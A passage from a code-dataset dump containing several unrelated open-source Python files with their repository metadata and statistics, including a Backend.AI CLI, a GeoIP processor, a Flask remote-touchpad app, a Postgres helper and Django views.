self.assertEqual(list(map(ord, engine.action("".join(map(chr, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]))))), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
self.assertEqual(list(map(ord, engine.action("".join(map(chr, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]))))), [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])
| 37.509804 | 142 | 0.652901 | 300 | 1,913 | 4.163333 | 0.453333 | 0.048038 | 0.014412 | 0.019215 | 0.280224 | 0.228983 | 0.192154 | 0.16253 | 0.16253 | 0.155324 | 0 | 0.081327 | 0.19655 | 1,913 | 50 | 143 | 38.26 | 0.731295 | 0.386827 | 0 | 0.214286 | 0 | 0 | 0.247405 | 0 | 0 | 0 | 0 | 0 | 0.178571 | 1 | 0.071429 | false | 0 | 0.142857 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ed740f84eb596b331c579907df179ccc0238174 | 1,414 | py | Python | src/ai/backend/client/cli/main.py | youngjun0627/backend.ai-client-py | be7c174ab73e112fdb8be61e6affc20fc72f7d59 | [
"MIT"
] | 7 | 2019-01-18T08:08:42.000Z | 2022-02-10T00:36:24.000Z | src/ai/backend/client/cli/main.py | youngjun0627/backend.ai-client-py | be7c174ab73e112fdb8be61e6affc20fc72f7d59 | [
"MIT"
] | 179 | 2017-09-07T04:54:44.000Z | 2022-03-29T11:30:47.000Z | src/ai/backend/client/cli/main.py | youngjun0627/backend.ai-client-py | be7c174ab73e112fdb8be61e6affc20fc72f7d59 | [
"MIT"
] | 13 | 2017-09-08T05:37:44.000Z | 2021-09-14T23:35:31.000Z | import warnings
import click
from ai.backend.cli.extensions import ExtendedCommandGroup
from ai.backend.client import __version__
from ai.backend.client.output import get_output_handler
from ai.backend.client.config import APIConfig, set_config
from ai.backend.client.cli.types import CLIContext, OutputMode
@click.group(
cls=ExtendedCommandGroup,
context_settings={
'help_option_names': ['-h', '--help'],
},
)
@click.option('--skip-sslcert-validation',
help='Skip SSL certificate validation for all API requests.',
is_flag=True)
@click.option('--output', type=click.Choice(['json', 'console']), default='console',
help='Set the output style of the command results.')
@click.version_option(version=__version__)
@click.pass_context
def main(ctx: click.Context, skip_sslcert_validation: bool, output: str) -> None:
"""
Backend.AI command line interface.
"""
from .announcement import announce
config = APIConfig(
skip_sslcert_validation=skip_sslcert_validation,
announcement_handler=announce,
)
set_config(config)
output_mode = OutputMode(output)
cli_ctx = CLIContext(
api_config=config,
output_mode=output_mode,
)
cli_ctx.output = get_output_handler(cli_ctx, output_mode)
ctx.obj = cli_ctx
from .pretty import show_warning
warnings.showwarning = show_warning
| 30.73913 | 84 | 0.712871 | 171 | 1,414 | 5.672515 | 0.391813 | 0.030928 | 0.06701 | 0.078351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.185997 | 1,414 | 45 | 85 | 31.422222 | 0.842745 | 0.024045 | 0 | 0 | 0 | 0 | 0.126833 | 0.018328 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0.027778 | 0.25 | 0 | 0.277778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8eda6227d1c508e3c3dc40e3141ee055d68cff84 | 4,849 | py | Python | src/main/python/cybercaptain/processing/country.py | FHNW-CyberCaptain/CyberCaptain | 07c989190e997353fbf57eb7a386947d6ab8ffd5 | [
"MIT"
] | 1 | 2018-10-01T10:59:55.000Z | 2018-10-01T10:59:55.000Z | src/main/python/cybercaptain/processing/country.py | FHNW-CyberCaptain/CyberCaptain | 07c989190e997353fbf57eb7a386947d6ab8ffd5 | [
"MIT"
] | null | null | null | src/main/python/cybercaptain/processing/country.py | FHNW-CyberCaptain/CyberCaptain | 07c989190e997353fbf57eb7a386947d6ab8ffd5 | [
"MIT"
] | 1 | 2021-11-01T00:09:00.000Z | 2021-11-01T00:09:00.000Z | """
The country module contains the processing_country class.
"""
from os import path
import geoip2.database
from cybercaptain.utils.exceptions import ValidationError
from cybercaptain.processing.base import processing_base
from cybercaptain.utils.jsonFileHandler import json_file_reader, json_file_writer
class processing_country(processing_base):
"""
The country class allows to map a given IP to an ISO 3166-1 alpha-2 country code and add it to the datasets.
Please provide a MaxMind GeoLite2-Country DB (.mmdb) yourself via the maxMindDbPath attribute.
Important: This module will NOT work with a City, Anonymous, ASN, Connection-Type, ... MaxMind database! Only country supported!
**Parameters**:
kwargs :
contains a dictionary of all attributes.
**Script Attributes**:
ipInputAttribute:
a str to where the IP attribute can be found in the give source dataset.
outputAttribute:
a str to where (& which key) output the ISO 3166-1 alpha-2 country code.
maxMindDbPath:
a str to where the maxmind GeoIP database is located.
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.validate(kwargs)
# If subclass needs special variables define here
self.ip_input_attribute = kwargs.get("ipInputAttribute")
self.output_attribute = kwargs.get("outputAttribute")
self.max_mind_db_path = kwargs.get("maxMindDbPath")
def run(self):
"""
Runs the clean algorythm.
**Returns**:
``True`` if this run succeeded.
``False`` if this run did not succeed.
"""
self.cc_log("INFO", "Data Processing Country: Started")
self.cc_log("DEBUG", "Trying to open the MaxMind GeoLite2-Country DB, please wait!")
try:
db = geoip2.database.Reader(self.max_mind_db_path)
except Exception as e:
self.logger.exception(e)
self.cc_log("ERROR", "Failed to open the MaxMind GeoLite2-Country DB at %s - please check the file!" % (self.max_mind_db_path))
return False
self.cc_log("DEBUG", "Opened the MaxMindGeoLite2-Country DB!")
json_fr = json_file_reader(self.src)
json_fw = json_file_writer(self.target)
self.cc_log("INFO", "Started to lookup ips and write into the target, please wait!")
while not json_fr.isEOF():
data = json_fr.readRecord()
country_code = "-99"
found_ip = data
for attribute in self.ip_input_attribute.split('.'):
found_ip = found_ip[attribute]
if not found_ip or found_ip == data:
self.cc_log("WARNING", "No IP found at the give ipInputAttribute place - Add country code -99 to this dataset!")
else:
# Lookup ip for country
try:
ip_info = db.country(found_ip)
if ip_info.country.iso_code: country_code = ip_info.country.iso_code
self.cc_log("DEBUG", "Found country code %s for ip %s" % (ip_info.country.iso_code, found_ip))
except Exception as e:
self.cc_log("WARNING", "No country code found for ip %s - add -99 to country code" % (found_ip))
data[self.output_attribute] = country_code
json_fw.writeRecord(data)
json_fr.close()
json_fw.close()
db.close()
self.cc_log("INFO", "Data Processing Country: Finished")
return True
def validate(self, kwargs):
"""
Validates all arguments for the country module.
kwargs(dict): contains a dictionary of all attributes.
"""
super().validate(kwargs)
self.cc_log("INFO", "Data Processing Country: started validation")
if not kwargs.get("ipInputAttribute"): raise ValidationError(self, ["ipInputAttribute"], "Parameter cannot be empty!")
if not kwargs.get("outputAttribute"): raise ValidationError(self, ["outputAttribute"] , "Parameters cannot be empty!")
if "." in kwargs.get("outputAttribute"): raise ValidationError(self, ["outputAttribute"] , "Parameters outputAttribute can not be a nested attribute - please configure a toplevel key!")
if not kwargs.get("maxMindDbPath"): raise ValidationError(self, ["maxMindDbPath"] , "Parameters cannot be empty!")
if ".mmdb" not in kwargs.get("maxMindDbPath"): raise ValidationError(self, ["maxMindDbPath"] , "Please only configure MaxMind-DBs for the path (.mmdb)!")
if not path.isfile(kwargs.get("maxMindDbPath")): raise ValidationError(self, ["maxMindDbPath"] , "Please configure an existing path to an existing MaxMind-DB!")
self.cc_log("INFO", "Data Processing Country: finished validation") | 45.745283 | 193 | 0.647556 | 603 | 4,849 | 5.089552 | 0.283582 | 0.021505 | 0.032258 | 0.02118 | 0.306289 | 0.2232 | 0.201043 | 0.144021 | 0 | 0 | 0 | 0.006654 | 0.256135 | 4,849 | 106 | 194 | 45.745283 | 0.844192 | 0.221283 | 0 | 0.070175 | 0 | 0 | 0.310449 | 0.006341 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.087719 | 0 | 0.192982 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ede460bd8fcc02049fe028261dea40e63202e0a | 1,411 | py | Python | contents/2020_ITinerary/assets/session_1/car.py | EunSeong-Park/ITinerary | 7e33613e3382f3e4b4404ad6795bc28823c7641d | [
"MIT"
] | 4 | 2020-03-31T01:18:43.000Z | 2020-11-21T16:53:02.000Z | contents/2020_ITinerary/assets/session_1/car.py | EunSeong-Park/ITinerary | 7e33613e3382f3e4b4404ad6795bc28823c7641d | [
"MIT"
] | null | null | null | contents/2020_ITinerary/assets/session_1/car.py | EunSeong-Park/ITinerary | 7e33613e3382f3e4b4404ad6795bc28823c7641d | [
"MIT"
] | null | null | null | # skeleton
class Car:
def __init__(self, name, mileage, max_fuel):
self.name = name
self.mileage = mileage
self.max_fuel = max_fuel
self.fuel = self.max_fuel
self.dist = 0
def status(self):
''' Show the current status of the car
it should be called after brrr() and gas_statation()
<<< Template >>>
Car name: [car name]
Mileage: [mileage]km/L
Fuel: [Current fuel]L / [Max fuel]L
Distance: [Total Distance]km
if fuel < 20 %, print this:
"WARNING: remaining fuel is too low"
'''
print("Car name: " + self.name)
print("Mileage: " + str(self.mileage) + "km/L")
print("Fuel: " + str(self.fuel) + "L" + " / " + str(self.max_fuel) + "L")
print("Distance: " + str(self.dist) + "km")
def brrr(self, km):
'''
Drive [km]km. You should implement:
- distance increases as you drive
- fuel decreases as you use
- if the fuel is empty, then you cannot go more
(+ print, "EMPTY!")
'''
for i in range(km):
if self.fuel > 1 / self.mileage: # it can go
self.fuel = self.fuel - 1 / self.mileage
self.dist = self.dist + 1
else: # it cannot go
break
self.status()
def gas_station(self):
self.fuel = self.max_fuel
self.status()
benz = Car("Benz", 25, 100)
benz.brrr(10000)
benz.gas_station()
benz.brrr(1000)
benz.gas_station()
| 26.12963 | 81 | 0.582566 | 201 | 1,411 | 4.019901 | 0.333333 | 0.060644 | 0.054455 | 0.037129 | 0.106436 | 0.056931 | 0 | 0 | 0 | 0 | 0 | 0.019704 | 0.280652 | 1,411 | 53 | 82 | 26.622642 | 0.776355 | 0.350106 | 0 | 0.214286 | 0 | 0 | 0.065476 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.178571 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8edeb880bd3ced5f319652f9f1bebc920f8b9270 | 1,855 | py | Python | main.py | webgjc/web-touch-pad | a9270bfde10ffb9dc490a793a1264751c3eed52e | [
"MIT"
] | 10 | 2021-07-01T08:26:56.000Z | 2021-11-05T05:20:29.000Z | main.py | webgjc/web-touch-pad | a9270bfde10ffb9dc490a793a1264751c3eed52e | [
"MIT"
] | null | null | null | main.py | webgjc/web-touch-pad | a9270bfde10ffb9dc490a793a1264751c3eed52e | [
"MIT"
] | 2 | 2021-07-09T09:10:24.000Z | 2021-07-29T05:32:34.000Z | import socket
import pynput
from gevent import pywsgi
from flask_sockets import Sockets
from flask import Flask, request, render_template
from geventwebsocket.handler import WebSocketHandler
app = Flask(__name__)
sockets = Sockets(app)
mouse = pynput.mouse.Controller()
@app.route("/", methods=['GET', 'POST'])
def index():
return render_template("index.html")
@app.route("/mouse/get/", methods=["GET"])
def getMousePosition():
# y, x
return str(int(mouse.position[0])) + "," + str(int(mouse.position[1]))
@sockets.route('/mouse/set/')
def setMouse(ws):
while not ws.closed:
message = ws.receive()
if message is not None:
if message.startswith("move"):
print("mouse move")
xy = message[10:].split(",")
mouse.position = (float(xy[1]), float(xy[0]))
if message.startswith("scroll"):
print("mouse scroll")
xy = message[10:].split(",")
mouse.scroll(float(xy[1]), float(xy[0]))
ws.send("success")
else:
print("no receive")
@app.route("/mouse/click/", methods=["GET"])
def clickMouse():
ms = request.args.get("mouse")
print("mouse click " + ms)
if ms == "left":
mouse.click(pynput.mouse.Button.left)
else:
mouse.click(pynput.mouse.Button.right)
return "success"
def getIp():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
if __name__ == "__main__":
# app.run("0.0.0.0", "8000", debug=True)
server = pywsgi.WSGIServer(("0.0.0.0", 8000), app, handler_class=WebSocketHandler)
print("server start at")
print("http://{}:8000".format(getIp()))
print("请在局域网另一个设备进行访问,可将那个设备作为本设备的触控板")
print("注意请将设备顺时针旋转90度使用")
server.serve_forever() | 27.686567 | 86 | 0.607547 | 230 | 1,855 | 4.817391 | 0.395652 | 0.01083 | 0.01083 | 0.034296 | 0.129964 | 0.028881 | 0 | 0 | 0 | 0 | 0 | 0.027102 | 0.224259 | 1,855 | 67 | 87 | 27.686567 | 0.742877 | 0.023181 | 0 | 0.078431 | 0 | 0 | 0.130387 | 0.016575 | 0 | 0 | 0 | 0 | 0 | 1 | 0.098039 | false | 0 | 0.117647 | 0.039216 | 0.294118 | 0.156863 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8edf5aa5e27f7a23873c95f6b823d38d6d75b822 | 2,652 | py | Python | dmsp/io.py | space-physics/digital-meridian-spectrometer | 8b46ad53c99a6340f28067fa5c3ee3c877cfcbf2 | [
"Apache-2.0"
] | null | null | null | dmsp/io.py | space-physics/digital-meridian-spectrometer | 8b46ad53c99a6340f28067fa5c3ee3c877cfcbf2 | [
"Apache-2.0"
] | null | null | null | dmsp/io.py | space-physics/digital-meridian-spectrometer | 8b46ad53c99a6340f28067fa5c3ee3c877cfcbf2 | [
"Apache-2.0"
] | null | null | null | from pathlib import Path
from typing import Tuple
from netCDF4 import Dataset
import xarray
import numpy as np
from datetime import datetime, timedelta
from dateutil.parser import parse
def load(
fn: Path, tlim: Tuple[datetime, datetime] = None, elevlim: Tuple[float, float] = None
) -> xarray.Dataset:
"""
This function works with 1983-2010 netCDF3 as well as 2011-present netCDF4 files.
"""
fn = Path(fn).expanduser()
# %% date from filename -- only way
ext = fn.suffix.lower()
if ext == ".nc":
d0 = datetime.strptime(fn.stem[13:21], "%Y%m%d")
elif ext == ".pf":
year = int(fn.stem[4:8])
days = int(fn.stem[8:11])
d0 = datetime(year, 1, 1) + timedelta(days=days - 1)
with Dataset(fn, "r") as f:
# %% load by time
secdayutc = f["Time"][:]
# convert to datetimes -- need as ndarray for next line
t = np.array([d0 + timedelta(seconds=int(s)) for s in secdayutc])
if tlim is not None and len(tlim) == 2:
if isinstance(tlim[0], str):
tlim = [parse(t) for t in tlim]
tind = (tlim[0] <= t) & (t <= tlim[1])
else:
tind = slice(None)
# %% elevation from North horizon
"""
elevation is not stored anywhere in the data files...
"""
elv = np.arange(181.0)
if elevlim is not None and len(elevlim) == 2:
elind = (elevlim[0] <= elv) & (elv <= elevlim[1])
else:
elind = slice(None)
# %% wavelength channels
wavelen = (f["Wavelength"][:] * 10).astype(int)
goodwl = wavelen > 1 # some channels are unused in some files
# %% load the data
# Analog=f['AnalogData'][tind,:]
# Ibase=f['BaseIntensity'][tind,goodwl,elind]
Ipeak = f["PeakIntensity"][tind, :, elind] # time x wavelength x elevation angle
if Ipeak.shape[1] != wavelen.size:
wavelen = wavelen[goodwl]
# %% root out bad channels 2011-03-01 for example
goodwl &= ~(Ipeak == 0).all(axis=(0, 2))
wavelen = wavelen[goodwl]
"""
astype(float) is critical to avoid overflow of int16 dtype!
"""
Ipeak = f["PeakIntensity"][tind, goodwl, elind].astype(float)
# %% filter factor per wavelength Rayleigh/PMT * 128
filtfact = f["FilterFactor"][goodwl]
# %% assemble output
R = xarray.Dataset(coords={"time": t[tind], "elevation": elv[elind]})
for i, w in enumerate(wavelen.astype(str)):
R[w] = (("time", "elevation"), Ipeak[:, i, :] * filtfact[i].astype(float) / 128.0)
return R
| 37.352113 | 90 | 0.565988 | 344 | 2,652 | 4.363372 | 0.436047 | 0.011992 | 0.011992 | 0.015989 | 0.019987 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03463 | 0.292232 | 2,652 | 70 | 91 | 37.885714 | 0.765051 | 0.20362 | 0 | 0.088889 | 0 | 0 | 0.047297 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.022222 | false | 0 | 0.155556 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ee1d299cf6ec687ec90359acd199e326a83c21f | 1,402 | py | Python | mergify_engine/config.py | bowlofeggs/mergify-engine | 463811a15835c1439fe75e3168113aa497892c77 | [
"Apache-2.0"
] | null | null | null | mergify_engine/config.py | bowlofeggs/mergify-engine | 463811a15835c1439fe75e3168113aa497892c77 | [
"Apache-2.0"
] | null | null | null | mergify_engine/config.py | bowlofeggs/mergify-engine | 463811a15835c1439fe75e3168113aa497892c77 | [
"Apache-2.0"
] | null | null | null | # -*- encoding: utf-8 -*-
#
# Copyright © 2017 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import re
import daiquiri
import yaml
LOG = daiquiri.getLogger(__name__)
with open(os.getenv("MERGIFYENGINE_SETTINGS", "fake.yml")) as f:
CONFIG = yaml.safe_load(f.read())
globals().update(CONFIG)
def log():
LOG.info("##################### CONFIGURATION ######################")
for name, value in CONFIG.items():
if (name in ["PRIVATE_KEY", "WEBHOOK_SECRET", "OAUTH_CLIENT_ID",
"OAUTH_CLIENT_SECRET", "MAIN_TOKEN", "FORK_TOKEN"] and
value is not None):
value = "*****"
if "URL" in name and value is not None:
value = re.sub(r'://[^@]*@', "://*****@", value)
LOG.info("* MERGIFYENGINE_%s: %s", name, value)
LOG.info("##########################################################")
| 31.155556 | 75 | 0.607703 | 183 | 1,402 | 4.579235 | 0.601093 | 0.071599 | 0.031026 | 0.038186 | 0.052506 | 0.052506 | 0 | 0 | 0 | 0 | 0 | 0.008029 | 0.200428 | 1,402 | 44 | 76 | 31.863636 | 0.738626 | 0.411555 | 0 | 0 | 0 | 0 | 0.337454 | 0.15204 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0.210526 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ee3cd2f187e49e671286db1a81ac32e75328dea | 3,740 | py | Python | planemo/database/postgres.py | pvanheus/planemo | 12c4256325bb1b274dcd40d64b91c1f832cf49b1 | [
"CC-BY-3.0"
] | 73 | 2015-01-03T15:09:26.000Z | 2022-03-30T23:52:55.000Z | planemo/database/postgres.py | pvanheus/planemo | 12c4256325bb1b274dcd40d64b91c1f832cf49b1 | [
"CC-BY-3.0"
] | 958 | 2015-01-02T08:27:45.000Z | 2022-03-23T14:51:51.000Z | planemo/database/postgres.py | jmchilton/planemo | d352a085fe10cb6b7c1384663b114201da42d97b | [
"CC-BY-3.0"
] | 84 | 2015-01-06T18:27:28.000Z | 2021-11-18T01:58:17.000Z | """Module describes a :class:`DatabaseSource` for local postgres databases."""
import subprocess
from galaxy.util import unicodify
from planemo.io import communicate
from .interface import DatabaseSource
class ExecutesPostgresSqlMixin:
def list_databases(self):
"""Use `psql --list` to generate a list of identifiers."""
command_builder = self._psql_command_builder("--list")
stdout = unicodify(self._communicate(command_builder))
output_lines = stdout.splitlines()
identifiers = []
for line in output_lines:
identifiers.append(line.split("|")[0].strip())
return [i for i in identifiers if i]
def create_database(self, identifier):
"""Use `psql -c "create database"` to create a database."""
sql = "create database %s;" % identifier
self._run_sql_command(sql)
def delete_database(self, identifier):
"""Use `psql -c "drop database"` to delete a database."""
sql = "drop database %s;" % identifier
self._run_sql_command(sql)
def _run_sql_command(self, sql):
# communicate is just joining commands so we need to modify the
# sql as an argument - it shouldn't do this.
sql_arg = '%s' % sql
command_builder = self._psql_command_builder("--command", sql_arg)
self._communicate(command_builder)
def _communicate(self, command_builder):
stdout, _ = communicate(
command_builder.command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
return stdout
class LocalPostgresDatabaseSource(ExecutesPostgresSqlMixin, DatabaseSource):
"""Local postgres database source managed through psql application."""
def __init__(self, **kwds):
"""Construct a postgres database source from planemo configuration."""
self.psql_path = kwds.get("postgres_psql_path", None) or 'psql'
self.database_user = kwds.get("postgres_database_user", None)
self.database_host = kwds.get("postgres_database_host", None)
self.database_port = kwds.get("postgres_database_port", None)
self._kwds = kwds
def sqlalchemy_url(self, identifier):
"""Return URL or form postgresql://username:password@localhost/mydatabase."""
hostname = self.database_host or "localhost"
if self.database_port:
hostname += ":%s" % self.database_port
return "postgresql://%s@%s/%s" % (
self.database_user,
hostname,
identifier
)
def _psql_command_builder(self, *args):
command_builder = _CommandBuilder(self.psql_path)
# Print only tuples so output is easier to parse
command_builder.append_command("--tuples-only")
# Specify connection information
if self.database_user:
command_builder.append_command("--username", self.database_user)
if self.database_host:
command_builder.append_command("--host", self.database_host)
if self.database_port:
command_builder.append_command("--port", self.database_port)
command_builder.append_command("-P", "pager=off")
command_builder.extend_command(args)
return command_builder
class _CommandBuilder(object):
def __init__(self, *args):
self.command = list(args)
def append_command(self, *args_or_none):
args_or_none = args_or_none or []
for arg_or_none in args_or_none:
if arg_or_none is not None:
self.command.append(arg_or_none)
def extend_command(self, args):
for arg in (args or []):
self.append_command(arg)
__all__ = (
"LocalPostgresDatabaseSource",
)
| 34.953271 | 85 | 0.655615 | 433 | 3,740 | 5.420323 | 0.265589 | 0.101406 | 0.034086 | 0.05752 | 0.141457 | 0.141457 | 0.072433 | 0.03579 | 0.03579 | 0 | 0 | 0.000354 | 0.244118 | 3,740 | 106 | 86 | 35.283019 | 0.829855 | 0.164973 | 0 | 0.055556 | 0 | 0 | 0.080415 | 0.036965 | 0 | 0 | 0 | 0 | 0 | 1 | 0.152778 | false | 0 | 0.055556 | 0 | 0.305556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ee5290b246e0f20240930080e650291b2ae9065 | 2,029 | py | Python | tests/test_mdnsCallbackHandler.py | pkeroulas/nmos-common | b650bad276819d794624f4ff6ea08fbdecd915d7 | [
"Apache-2.0"
] | 7 | 2017-12-08T08:05:51.000Z | 2020-10-21T07:32:42.000Z | tests/test_mdnsCallbackHandler.py | pkeroulas/nmos-common | b650bad276819d794624f4ff6ea08fbdecd915d7 | [
"Apache-2.0"
] | 63 | 2017-12-13T08:46:58.000Z | 2020-12-02T08:48:40.000Z | tests/test_mdnsCallbackHandler.py | pkeroulas/nmos-common | b650bad276819d794624f4ff6ea08fbdecd915d7 | [
"Apache-2.0"
] | 7 | 2017-11-22T10:49:23.000Z | 2022-03-15T22:00:17.000Z | #!/usr/bin/env python
# Copyright 2017 British Broadcasting Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from mock import MagicMock
from nmoscommon.mdns.mdnsCallbackHandler import MDNSAdvertisementCallbackHandler
class TestMDNSCallbackHandler(unittest.TestCase):
def setUp(self):
self.callback = MagicMock()
self.dut = MagicMock()
self.name = "testName"
self.regtype = "_nmos-test._tcp"
self.port = 8080,
self.txtRecord = {}
self.dut = MDNSAdvertisementCallbackHandler(
self.callback,
self.regtype,
self.name,
self.port,
self.txtRecord
)
def build_expected(self, action):
return {
"action": action,
"name": self.name,
"regtype": self.regtype,
"port": self.port,
"txtRecord": self.txtRecord
}
def check_callback_test(self, action):
argv, kwargs = self.callback.call_args
expected = self.build_expected(action)
actual = argv[0]
self.assertDictEqual(actual, expected)
def test_collision(self):
self.dut.entryCollision()
self.check_callback_test("collision")
def test_failed(self):
self.dut.entryFailed()
self.check_callback_test("failed")
def test_established(self):
self.dut.entryEstablished()
self.check_callback_test("established")
if __name__ == "__main__":
unittest.main()
| 28.985714 | 80 | 0.656481 | 231 | 2,029 | 5.662338 | 0.489177 | 0.045872 | 0.051988 | 0.048165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008592 | 0.254312 | 2,029 | 69 | 81 | 29.405797 | 0.855915 | 0.290784 | 0 | 0 | 0 | 0 | 0.061053 | 0 | 0 | 0 | 0 | 0 | 0.02381 | 1 | 0.142857 | false | 0 | 0.071429 | 0.02381 | 0.261905 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ee6449defa3c3d44a2b59e09354dc78f44affea | 882 | py | Python | src/posts/views.py | wmtamit/IceBook-Django | 4625f6ae879c64be9d71d10eca111b837f2fe8bc | [
"MIT"
] | null | null | null | src/posts/views.py | wmtamit/IceBook-Django | 4625f6ae879c64be9d71d10eca111b837f2fe8bc | [
"MIT"
] | null | null | null | src/posts/views.py | wmtamit/IceBook-Django | 4625f6ae879c64be9d71d10eca111b837f2fe8bc | [
"MIT"
] | null | null | null | from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from .models import Post
from .forms import PostForm
@login_required
def add_post_view(request):
if request.method == "POST":
form = PostForm(request.POST, request.FILES)
if form.is_valid():
obj = form.save(commit=False)
obj.user = request.user
obj.save()
form = PostForm()
template_name = "posts/add_post.html"
context = {
"form":form
}
return render(request, template_name, context)
def display_posts_view(request):
posts = Post.objects.all()
template_name = "posts/display_posts.html"
context = {
"posts":posts
}
return render(request, template_name, context)
def detail_post_view(request, slug):
post = Post.objects.get(slug=slug)
template_name = "posts/detail_post.html"
context = {
"post":post
}
return render(request, template_name, context)
| 23.837838 | 57 | 0.741497 | 121 | 882 | 5.256198 | 0.338843 | 0.113208 | 0.080189 | 0.127358 | 0.188679 | 0.188679 | 0.128931 | 0 | 0 | 0 | 0 | 0 | 0.141723 | 882 | 36 | 58 | 24.5 | 0.840159 | 0 | 0 | 0.1875 | 0 | 0 | 0.092971 | 0.052154 | 0 | 0 | 0 | 0 | 0 | 1 | 0.09375 | false | 0 | 0.125 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
8ee86c19092798935cd7b241e9fbac234703710d | 14,019 | py | Python | cvpro/Utils.py | Mohak-CODING-HEAVEN/CVPRO | 09a2cb4a428738c9e77f17b71469d55eff5e3699 | [
"MIT"
] | 5 | 2021-07-24T18:20:11.000Z | 2022-03-23T09:58:27.000Z | cvpro/Utils.py | Mohak-CODING-HEAVEN/cvpro | 09a2cb4a428738c9e77f17b71469d55eff5e3699 | [
"MIT"
] | null | null | null | cvpro/Utils.py | Mohak-CODING-HEAVEN/cvpro | 09a2cb4a428738c9e77f17b71469d55eff5e3699 | [
"MIT"
] | null | null | null | """
Utilities - CVPRO
BY: MOHAK BAJAJ
CODING HEAVEN
"""
import math
import time
import logging
import cv2
import numpy as np
import copy
def stackImages(_imgList, cols, scale):
"""
Stack Images together to display in a single window
:param _imgList: list of images to stack
:param cols: the num of img in a row
:param scale: bigger~1+ ans smaller~1-
